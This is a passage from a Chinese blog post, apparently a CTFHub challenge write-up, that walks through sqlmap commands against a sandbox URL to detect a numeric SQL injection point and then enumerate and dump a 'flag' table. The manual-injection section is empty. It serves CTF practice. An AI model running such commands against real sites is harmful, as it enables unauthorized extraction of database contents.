0
点赞
收藏
分享

微信扫一扫

SQL注入---数字型注入与字符型注入


文章目录

  • ​​SQLMAP注入​​
  • ​​手动注入​​

SQLMAP注入

①判断注入点

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1”

发现是一个注入点

SQL注入---数字型注入与字符型注入_sql


②查询数据库

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” --current-db

SQL注入---数字型注入与字符型注入_导出数据_02

得到当前数据库sqli

③查询数据表(flag与news)

SQL注入---数字型注入与字符型注入_sql_03

④查询字段

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” --columns

SQL注入---数字型注入与字符型注入_导出数据_04

⑤导出数据
sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” -C “flag” --dump

SQL注入---数字型注入与字符型注入_数据库sql_05

手动注入


举报

相关推荐

0 条评论